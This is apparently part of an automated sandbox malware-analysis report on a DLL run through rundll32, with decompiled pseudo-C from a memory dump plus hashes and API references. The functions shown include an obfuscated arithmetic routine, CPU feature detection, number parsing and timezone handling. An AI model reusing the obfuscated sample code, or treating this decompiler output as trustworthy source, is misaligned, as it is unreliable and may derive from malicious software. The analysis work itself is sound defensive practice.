                				 *(_t258 + 0x20) = ( *(_t258 + 0x100) - _t173) * 0x15fd;
                				_t147 = E00007FFA7FFA535F9404( *(_t258 + 0x128) + _t170,  *((intOrPtr*)(_t260 + 0x4b8)) +  *((intOrPtr*)(_t260 + 0x108)),  *(_t258 + 0x168), ( *(_t258 + 0x128) + _t170) * 0x181f,  *((intOrPtr*)(_t260 + 0x110)) + 0x2114,  *(_t260 + 0x3c8) *  *(_t260 + 0xd8) & _t173, _t227, __rdx, _t257, _t260, __r10);
                				_t261 =  *((intOrPtr*)(_t258 + 0x158));
                				r9d =  *(_t258 + 0x160);
                				_t180 =  *(_t258 + 0x108);
                				r15d =  *(_t258 + 0x80);
                				 *(_t258 + 0x148) = _t147;
                				r9d = r9d + 1;
                				 *(_t258 + 0x160) = r9d;
                				if (r9d - ( *(_t258 + 0x90) ^  *(_t261 + 0x3a0)) <= 0) goto 0x535fac0d;
                				r10d =  *(_t258 + 0x84);
                				r11d =  *((intOrPtr*)(_t258 + 0x88));
                				r9d =  *(_t258 + 0x128);
                				if ( *(_t258 + 0x140) - _t268 + 0x2d5 > 0) goto 0x535fae39;
                				 *( *(_t261 + 0x468)) =  *( *((intOrPtr*)(_t261 + 0x108)) + 0x1b0) ^ 0x4d747a9d;
                				 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x240)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x240)) + 0x138)) + (M00007FFA7FFA5366FCCE & 0x000000ff) - 0x1ba7;
                				 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x358)) + 0x130)) =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x358)) + 0x130)) + ( *( *((intOrPtr*)(_t261 + 0x20)) + 0x1b0) ^ 0x000015fd);
                				goto 0x535faf04;
                				if (r10d -  *(_t261 + 0x298) * _t147 >= 0) goto 0x535faeb6;
                				_t219 = _t180;
                				 *(_t261 + 0x478) = r9d ^ 0x00000c92 | _t219;
                				_t245 =  *(_t261 + 0x110);
                				if (_t245 - _t219 <= 0) goto 0x535faf04;
                				 *(_t261 + 0x2a8) =  *(_t261 + 0x2a8) ^  *((intOrPtr*)(_t261 + 0x5e8)) +  *((intOrPtr*)(_t261 + 0x398));
                				_t223 =  *(_t261 + 8) | _t245;
                				 *(_t261 + 0x130) =  *(_t261 + 0x130) ^ _t223;
                				 *(_t261 + 0x48) = _t223;
                				goto 0x535faf04;
                				_t248 =  *((intOrPtr*)(_t261 + 0x3d0)) + r11d & _t180;
                				if ( *((intOrPtr*)(_t261 + 0x418)) == _t248) goto 0x535faf04;
                				r9d = r9d + 3;
                				if (r9d != _t248) goto 0x535faeed;
                				 *(_t261 + 0x110) =  *(_t261 + 0x110) * (( *(_t258 + 0xf8) ^  *(_t261 + 0x338)) + 0xffffea7e);
                				return _t268 + 0x82a;
                			}





























                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3ed4ea9edc56720b8176b03aed4402a0dae7519b63c2286c6d7ac63d9ff4033
                • Instruction ID: c7cc8613d6c33c7b10c2d0a6f4d5019efd6fb57d436517014519ad7feb7bc9e4
                • Opcode Fuzzy Hash: d3ed4ea9edc56720b8176b03aed4402a0dae7519b63c2286c6d7ac63d9ff4033
                • Instruction Fuzzy Hash: 52C18BB360AB848BD7A4DF04E4827EA77A9F788794F14812ACB8D47B54DF38D548CB01
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00007FFA7FFA535F1AD0(signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                				intOrPtr _v12;
                				intOrPtr _v20;
                				intOrPtr _t11;
                				intOrPtr _t15;
                				intOrPtr* _t24;
                				void* _t25;
                
                				_t25 = __r8;
                				r8d = 0;
                				 *0x537557b0 = r8d;
                				_t1 = _t25 + 1; // 0x1
                				r9d = _t1;
                				asm("cpuid");
                				 *_t24 = r9d;
                				 *((intOrPtr*)(_t24 + 8)) = 0;
                				_v20 = _t11;
                				_v12 = _t15;
                				if (0 != 0x18001000) goto 0x535f1b31;
                				asm("xgetbv");
                				_a8 = __rdx << 0x00000020 | __rax;
                				r8d =  *0x537557b0; // 0x1
                				r8d =  ==  ? r9d : r8d;
                				 *0x537557b0 = r8d;
                				 *0x537557b4 = r8d;
                				return 0;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12714a0aa0805da834a40ae92795c237d78cfdcda44e27ff10ce6fdf81eed4e7
                • Instruction ID: 6dc950c68d7a7320f5d313b5d5f6876b914a6d893515b092a1801511546eb5ef
                • Opcode Fuzzy Hash: 12714a0aa0805da834a40ae92795c237d78cfdcda44e27ff10ce6fdf81eed4e7
                • Instruction Fuzzy Hash: 97F06871B2A795CBDB98CF28A4126297BE5F768390F94C43DD58D83B04D63C94608F04
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Xp_mulh$Xp_addx$Xp_setw$get_acsize
                • String ID:
                • API String ID: 2413281849-0
                • Opcode ID: 08556232719dacff47f9c58568dd6f539aeb3d9199d3a2cc78726d0cd2e48932
                • Instruction ID: 12b262dc170e12c1e4ed56f378007fa44dc94dc0932552693e172672b51512a9
                • Opcode Fuzzy Hash: 08556232719dacff47f9c58568dd6f539aeb3d9199d3a2cc78726d0cd2e48932
                • Instruction Fuzzy Hash: 6DC1C132E28B498AF701DB7694810FD7336AF9E344B48DB71EA0D329A5EF28B5459740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00007FFA7FFA535E6478(void* __ebx, void* __ecx, void* __edx, void* __esi, signed short* __rax, long long __rbx, signed short** __rdx, long long __rsi, void* __r8, void* __r10) {
                				void* _t133;
                				void* _t165;
                				void* _t189;
                				void* _t192;
                				signed short _t195;
                				signed short _t196;
                				signed short _t197;
                				signed int _t198;
                				signed int _t222;
                				void* _t225;
                				void* _t333;
                				signed short* _t352;
                				signed short* _t354;
                				signed long long _t356;
                				signed short* _t358;
                				signed short* _t359;
                				signed short* _t361;
                				intOrPtr* _t362;
                				long long _t370;
                				long long* _t372;
                				signed short* _t374;
                				signed short* _t375;
                				long long* _t378;
                				long long* _t379;
                				long long* _t383;
                				long long* _t385;
                				signed short** _t387;
                				long long _t389;
                				long long _t391;
                				void* _t393;
                				void* _t394;
                				void* _t396;
                				void* _t405;
                
                				_t396 = __r8;
                				_t389 = __rsi;
                				_t370 = __rbx;
                				 *((long long*)(_t393 + 8)) = __rbx;
                				 *((long long*)(_t393 + 0x18)) = _t391;
                				 *((long long*)(_t393 + 0x20)) = __rsi;
                				_push(_t405);
                				_t394 = _t393 - 0xa0;
                				r13d = 0;
                				sil = r9b;
                				r15d = r8d;
                				_t387 = __rdx;
                				if ( *((intOrPtr*)(__rdx)) != _t405) goto 0x535e64ce;
                				_t133 = E00007FFA7FFA535E8380(__rax);
                				 *__rax = 0x16;
                				E00007FFA7FFA535E8260(_t133);
                				_t372 = _t387[1];
                				if (_t372 == 0) goto 0x535e64c7;
                				 *_t372 =  *_t387;
                				goto 0x535e6c0f;
                				if (r8d == 0) goto 0x535e64dc;
                				if (__r8 - 2 - 0x22 > 0) goto 0x535e64a8;
                				_t383 = _t372;
                				E00007FFA7FFA535E4AE8(__rbx, _t394 + 0x78, _t383);
                				 *((long long*)(_t394 + 0x98)) =  *_t387;
                				goto 0x535e6512;
                				_t352 =  *_t387;
                				_t195 =  *_t352 & 0x0000ffff;
                				 *_t387 =  &(_t352[1]);
                				if (E00007FFA7FFA535E8604(_t195, _t195 & 0x0000ffff, _t225, _t370, _t394 + 0x78) != 0) goto 0x535e6508;
                				bpl = sil != 0;
                				if (_t195 != 0x2d) goto 0x535e6538;
                				goto 0x535e653e;
                				if (_t195 != 0x2b) goto 0x535e654b;
                				_t354 =  *_t387;
                				_t196 =  *_t354 & 0x0000ffff;
                				 *_t387 =  &(_t354[1]);
                				 *((intOrPtr*)(_t394 + 0x74)) = 0x66a;
                				 *((intOrPtr*)(_t394 + 0xd8)) = 0xaf0;
                				 *((intOrPtr*)(_t394 + 0x50)) = 0xb66;
                				 *((intOrPtr*)(_t394 + 0x28)) = 0xb70;
                				r11d = 0xff10;
                				 *((intOrPtr*)(_t394 + 0x68)) = 0xc66;
                				_t14 = _t389 - 0x80; // 0x9e6
                				r10d = _t14;
                				 *((intOrPtr*)(_t394 + 0x30)) = 0xc70;
                				 *((intOrPtr*)(_t394 + 0x58)) = 0xce6;
                				r8d = 0x6f0;
                				 *((intOrPtr*)(_t394 + 0x38)) = 0xcf0;
                				r9d = 0x966;
                				 *((intOrPtr*)(_t394 + 0x70)) = 0xd66;
                				 *((intOrPtr*)(_t394 + 0x40)) = 0xd70;
                				 *((intOrPtr*)(_t394 + 0x60)) = 0xe50;
                				 *((intOrPtr*)(_t394 + 0x48)) = 0xe5a;
                				 *((intOrPtr*)(_t394 + 0x6c)) = 0xed0;
                				 *((intOrPtr*)(_t394 + 0x20)) = 0xeda;
                				 *((intOrPtr*)(_t394 + 0x24)) = 0xf20;
                				 *((intOrPtr*)(_t394 + 0x2c)) = 0xf2a;
                				 *((intOrPtr*)(_t394 + 0x34)) = 0x1040;
                				 *((intOrPtr*)(_t394 + 0x3c)) = 0x104a;
                				 *((intOrPtr*)(_t394 + 0x44)) = 0x17e0;
                				 *((intOrPtr*)(_t394 + 0x4c)) = 0x17ea;
                				 *((intOrPtr*)(_t394 + 0x54)) = 0x1810;
                				 *((intOrPtr*)(_t394 + 0x5c)) = 0x181a;
                				 *((intOrPtr*)(_t394 + 0x64)) = 0xff1a;
                				if ((r15d & 0xffffffef) != 0) goto 0x535e68e2;
                				if (_t196 - 0x30 < 0) goto 0x535e6808;
                				if (_t196 - 0x3a >= 0) goto 0x535e6656;
                				goto 0x535e6803;
                				if (_t196 - r11w >= 0) goto 0x535e67f1;
                				if (_t196 - 0x660 < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x74)) >= 0) goto 0x535e667a;
                				goto 0x535e6803;
                				if (_t196 - r8w < 0) goto 0x535e6808;
                				if (_t196 - 0x6fa >= 0) goto 0x535e6699;
                				goto 0x535e6803;
                				if (_t196 - r9w < 0) goto 0x535e6808;
                				if (_t196 - 0x970 >= 0) goto 0x535e66b8;
                				goto 0x535e6803;
                				if (_t196 - r10w < 0) goto 0x535e6808;
                				if (_t196 - 0x9f0 >= 0) goto 0x535e66d7;
                				goto 0x535e6803;
                				if (_t196 - 0xa66 < 0) goto 0x535e6808;
                				if (_t196 - 0xa70 >= 0) goto 0x535e66f4;
                				goto 0x535e6803;
                				if (_t196 - (_t196 & 0x0000ffff) - 0xa66 < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0xd8)) >= 0) goto 0x535e6714;
                				goto 0x535e6803;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x50)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x28)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x68)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x30)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x58)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x38)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x70)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x40)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x60)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x48)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x6c)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x20)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x24)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x2c)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x34)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x3c)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x44)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x4c)) < 0) goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x54)) < 0) goto 0x535e6808;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x5c)) >= 0) goto 0x535e6808;
                				goto 0x535e6670;
                				if (_t196 -  *((intOrPtr*)(_t394 + 0x64)) >= 0) goto 0x535e6800;
                				goto 0x535e6803;
                				if (((_t196 & 0x0000ffff) - r11d | 0xffffffff) != 0xffffffff) goto 0x535e6831;
                				_t58 = _t370 - 0x41; // 0xfecf
                				if (_t58 - 0x19 <= 0) goto 0x535e681f;
                				_t59 = _t370 - 0x61; // 0xfeaf
                				if (_t59 - 0x19 <= 0) goto 0x535e681f;
                				goto 0x535e6831;
                				_t60 = _t370 - 0x61; // 0xfeaf
                				if (_t60 - 0x19 > 0) goto 0x535e682e;
                				if ((_t196 & 0x0000ffff) - 0x20 + 0xffffffc9 == 0) goto 0x535e6845;
                				if (r15d != 0) goto 0x535e6894;
                				_t61 = _t389 + 2; // 0xa
                				r15d = _t61;
                				goto 0x535e6894;
                				_t356 =  *_t387;
                				r8d = 0xffdf;
                				_t222 =  *_t356 & 0x0000ffff;
                				_t62 = _t356 + 2; // 0xffe1
                				_t374 = _t62;
                				 *_t387 = _t374;
                				_t63 = _t383 - 0x58; // 0x608
                				if ((r8w & _t63) == 0) goto 0x535e68ca;
                				r15d =  ==  ? 8 : r15d;
                				_t375 =  &(_t374[0xffffffffffffffff]);
                				 *_t387 = _t375;
                				if (_t222 == 0) goto 0x535e688f;
                				if ( *_t375 == _t222) goto 0x535e688f;
                				_t165 = E00007FFA7FFA535E8380(_t356);
                				 *_t356 = 0x16;
                				E00007FFA7FFA535E8260(_t165);
                				r11d = 0xff10;
                				r13d = 0x660;
                				r12d = 0x6f0;
                				if (_t196 - 0x30 < 0) goto 0x535e6a8c;
                				if (_t196 - 0x3a >= 0) goto 0x535e68e9;
                				r8d = _t196 & 0x0000ffff;
                				r8d = r8d - 0x30;
                				goto 0x535e6a86;
                				_t197 =  *_t375 & 0x0000ffff;
                				r15d =  ==  ? 0x10 : r15d;
                				_t70 =  &(_t375[1]); // 0xffe3
                				_t358 = _t70;
                				 *_t387 = _t358;
                				goto 0x535e688f;
                				goto 0x535e6894;
                				if (_t197 - r11w >= 0) goto 0x535e6a72;
                				if (_t197 - r13w < 0) goto 0x535e6a8c;
                				if (_t197 - 0x66a >= 0) goto 0x535e6913;
                				r8d = _t197 & 0x0000ffff;
                				r8d = r8d - r13d;
                				goto 0x535e6a86;
                				if (_t197 - r12w < 0) goto 0x535e6a8c;
                				if (_t197 - 0x6fa >= 0) goto 0x535e6933;
                				r8d = _t197 & 0x0000ffff;
                				r8d = r8d - r12d;
                				goto 0x535e6a86;
                				if (_t197 - 0x966 < 0) goto 0x535e6a8c;
                				_t71 =  &(_t358[5]); // 0x970
                				r8d = _t71;
                				if (_t197 - r8w >= 0) goto 0x535e6957;
                				r8d = _t197 & 0x0000ffff;
                				r8d = r8d - 0x966;
                				goto 0x535e6a86;
                				if (_t197 - 0x9e6 < 0) goto 0x535e6a8c;
                				_t72 =  &(_t358[5]); // 0x9f0
                				r8d = _t72;
                				if (_t197 - r8w < 0) goto 0x535e694b;
                				_t73 = _t396 + 0x76; // 0xa66
                				if (_t197 - _t73 < 0) goto 0x535e6a8c;
                				_t74 =  &(_t358[5]); // 0xa70
                				r8d = _t74;
                				if (_t197 - r8w < 0) goto 0x535e694b;
                				_t75 = _t396 + 0x76; // 0xae6
                				if (_t197 - _t75 < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0xd8)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x50)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x28)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x68)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x30)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x58)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x38)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x70)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x40)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x60)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x48)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x6c)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x20)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x24)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x2c)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x34)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x3c)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x44)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x4c)) < 0) goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x54)) < 0) goto 0x535e6a8c;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x5c)) >= 0) goto 0x535e6a8c;
                				goto 0x535e694b;
                				if (_t197 -  *((intOrPtr*)(_t394 + 0x64)) >= 0) goto 0x535e6a82;
                				r8d = _t197 & 0x0000ffff;
                				r8d = r8d - r11d;
                				goto 0x535e6a86;
                				r8d = r8d | 0xffffffff;
                				if (r8d != 0xffffffff) goto 0x535e6ab9;
                				_t98 = _t370 - 0x41; // 0xfecf
                				if (_t98 - 0x19 <= 0) goto 0x535e6aa4;
                				_t99 = _t370 - 0x61; // 0xfeaf
                				if (_t99 - 0x19 <= 0) goto 0x535e6aa4;
                				r8d = r8d | 0xffffffff;
                				goto 0x535e6ab9;
                				_t100 = _t370 - 0x61; // 0xfeaf
                				r8d = _t197 & 0x0000ffff;
                				if (_t100 - 0x19 > 0) goto 0x535e6ab5;
                				r8d = r8d - 0x20;
                				r8d = r8d + 0xffffffc9;
                				if (r8d == 0xffffffff) goto 0x535e6afe;
                				if (r8d - r15d >= 0) goto 0x535e6afe;
                				_t333 = _t405 - (_t356 | 0xffffffff);
                				if (_t333 < 0) goto 0x535e6ada;
                				if (_t333 != 0) goto 0x535e6ad5;
                				if (_t358 - _t383 <= 0) goto 0x535e6ada;
                				goto 0x535e6aec;
                				r14d = r8d;
                				_t359 =  *_t387;
                				_t198 =  *_t359 & 0x0000ffff;
                				 *_t387 =  &(_t359[1]);
                				goto 0x535e68af;
                				 *_t387 =  &(( *_t387)[0xffffffffffffffff]);
                				r13d = 0;
                				_t361 =  *_t387;
                				if (_t198 == 0) goto 0x535e6b2a;
                				if ( *_t361 == _t198) goto 0x535e6b2a;
                				_t189 = E00007FFA7FFA535E8380(_t361);
                				 *_t361 = 0x16;
                				E00007FFA7FFA535E8260(_t189);
                				if ((sil & bpl) != 0) goto 0x535e6b51;
                				 *_t387 =  *((intOrPtr*)(_t394 + 0x98));
                				if ( *((intOrPtr*)(_t394 + 0x90)) == r13b) goto 0x535e64b8;
                				_t362 =  *((intOrPtr*)(_t394 + 0x78));
                				 *(_t362 + 0x3a8) =  *(_t362 + 0x3a8) & 0xfffffffd;
                				goto 0x535e64b8;
                				if (E00007FFA7FFA535E6118(r13d | 0xe) == 0) goto 0x535e6bde;
                				_t192 = E00007FFA7FFA535E8380(_t362);
                				 *_t362 = 0x22;
                				if ((bpl & 0x00000001) != 0) goto 0x535e6b76;
                				goto 0x535e6be7;
                				if ((bpl & 0x00000002) == 0) goto 0x535e6bad;
                				if ( *((intOrPtr*)(_t394 + 0x90)) == r13b) goto 0x535e6b92;
                				 *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) =  *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) & 0xfffffffd;
                				_t378 = _t387[1];
                				if (_t378 == 0) goto 0x535e6ba1;
                				 *_t378 =  *_t387;
                				goto 0x535e6c0f;
                				if ( *((intOrPtr*)(_t394 + 0x90)) == r13b) goto 0x535e6bc3;
                				 *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) =  *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) & 0xfffffffd;
                				_t379 = _t387[1];
                				if (_t379 == 0) goto 0x535e6bd2;
                				 *_t379 =  *_t387;
                				goto 0x535e6c0f;
                				if ((bpl & 0x00000002) == 0) goto 0x535e6be7;
                				if ( *((intOrPtr*)(_t394 + 0x90)) == r13b) goto 0x535e6bfd;
                				 *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) =  *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) & 0xfffffffd;
                				_t385 = _t387[1];
                				if (_t385 == 0) goto 0x535e6c0c;
                				 *_t385 =  *_t387;
                				return _t192;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: +$-$f$p
                • API String ID: 3215553584-588565063
                • Opcode ID: 426e360ae1e79765073973edcb545938b5323c8836b4422cb39569a496d13089
                • Instruction ID: 306b8eff74f54417a3e7e20041b2527a56d57bda196a8f21fce89b5a13644fe6
                • Opcode Fuzzy Hash: 426e360ae1e79765073973edcb545938b5323c8836b4422cb39569a496d13089
                • Instruction Fuzzy Hash: FB12D822E2CB538EFB605B10D044279669BEFD27A0F9CD2B1D69D175C4CB3DE488AB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E00007FFA7FFA535EB50C(void* __ecx, void* __esi, void* __eflags, signed int** __rax, void* __rdx, void* __r8, signed int _a8, signed int _a16, signed int _a24, char _a32) {
                				long long _v48;
                				long long _v56;
                				intOrPtr _v64;
                				long long _v72;
                				void* __rbx;
                				void* __rdi;
                				void* _t34;
                				intOrPtr _t42;
                				void* _t48;
                				void* _t49;
                				void* _t50;
                				signed int _t55;
                				signed int _t59;
                				intOrPtr _t70;
                				intOrPtr _t71;
                				void* _t77;
                				signed int** _t78;
                				signed int* _t85;
                				signed int** _t86;
                				long long _t90;
                				void* _t94;
                				long long _t95;
                				void* _t103;
                
                				_t93 = __rdx;
                				_t78 = __rax;
                				E00007FFA7FFA535EAA38(_t34);
                				_a8 = 0;
                				_t86 = _t78;
                				_a16 = 0;
                				_a24 = 0;
                				if (E00007FFA7FFA535EAAA0(__ecx, _t78,  &_a8, __rdx) != 0) goto 0x535eb6cb;
                				if (E00007FFA7FFA535EAA40(__ecx, _t78,  &_a16, __rdx) != 0) goto 0x535eb6b6;
                				if (E00007FFA7FFA535EAA70(__ecx, _t78,  &_a24, __rdx, _t94) != 0) goto 0x535eb6a1;
                				_t90 =  *0x53755278; // 0x0
                				E00007FFA7FFA535E7E58(_t78, _t90);
                				 *0x53755278 = _t95;
                				if (GetTimeZoneInformation(??) == 0xffffffff) goto 0x535eb67a;
                				_t55 =  *0x53755290 * 0x3c;
                				_t7 = _t95 + 1; // 0x1
                				r8d = _t7;
                				_t70 =  *0x537552d6; // 0x0
                				_t59 =  *0x537552e4; // 0x0
                				 *0x53755280 = r8d;
                				_a8 = _t55;
                				if (_t70 == 0) goto 0x535eb5b3;
                				_a8 = _t55 + _t59 * 0x3c;
                				_t71 =  *0x5375532a; // 0x0
                				if (_t71 == 0) goto 0x535eb5d4;
                				_t42 =  *0x53755338; // 0x0
                				if (_t42 == 0) goto 0x535eb5d4;
                				_a16 = r8d;
                				_a24 = (_t42 - _t59) * 0x3c;
                				goto 0x535eb5da;
                				_a16 = 0;
                				_a24 = 0;
                				E00007FFA7FFA535F04CC(_t55 + _t59 * 0x3c, _t77, _t78, _t86, 0x53755290, _t93, _t103);
                				r9d = r9d | 0xffffffff;
                				_v48 =  &_a32;
                				_v56 = _t95;
                				_v64 = 0x3f;
                				_v72 =  *_t86;
                				if (WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x535eb626;
                				if (_a32 != 0) goto 0x535eb626;
                				( *_t86)[0xf] = sil;
                				goto 0x535eb62c;
                				 *( *_t86) = sil;
                				r9d = r9d | 0xffffffff;
                				_v48 =  &_a32;
                				_v56 = _t95;
                				_v64 = 0x3f;
                				_v72 = _t86[1];
                				if (WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x535eb673;
                				if (_a32 != 0) goto 0x535eb673;
                				_t86[1][0xf] = sil;
                				goto 0x535eb67a;
                				_t85 = _t86[1];
                				 *_t85 = sil;
                				_t48 = E00007FFA7FFA535EAA30(_t47);
                				 *_t85 = _a8;
                				_t49 = E00007FFA7FFA535EAA20(_t48);
                				 *_t85 = _a16;
                				_t50 = E00007FFA7FFA535EAA28(_t49);
                				 *_t85 = _a24;
                				return _t50;
                			}

                APIs
                • _get_daylight.LIBCMT ref: 00007FFA535EB52F
                  • Part of subcall function 00007FFA535EAAA0: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAAB4
                • _get_daylight.LIBCMT ref: 00007FFA535EB540
                  • Part of subcall function 00007FFA535EAA40: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAA54
                • _get_daylight.LIBCMT ref: 00007FFA535EB551
                  • Part of subcall function 00007FFA535EAA70: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAA84
                  • Part of subcall function 00007FFA535E7E58: HeapFree.KERNEL32(?,?,?,00007FFA535E7915,?,?,?,?,?,?,00000000,00007FFA535E7C0D), ref: 00007FFA535E7E6E
                  • Part of subcall function 00007FFA535E7E58: GetLastError.KERNEL32(?,?,?,00007FFA535E7915,?,?,?,?,?,?,00000000,00007FFA535E7C0D), ref: 00007FFA535E7E80
                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFA535EB7B1), ref: 00007FFA535EB578
                • WideCharToMultiByte.KERNEL32 ref: 00007FFA535EB60E
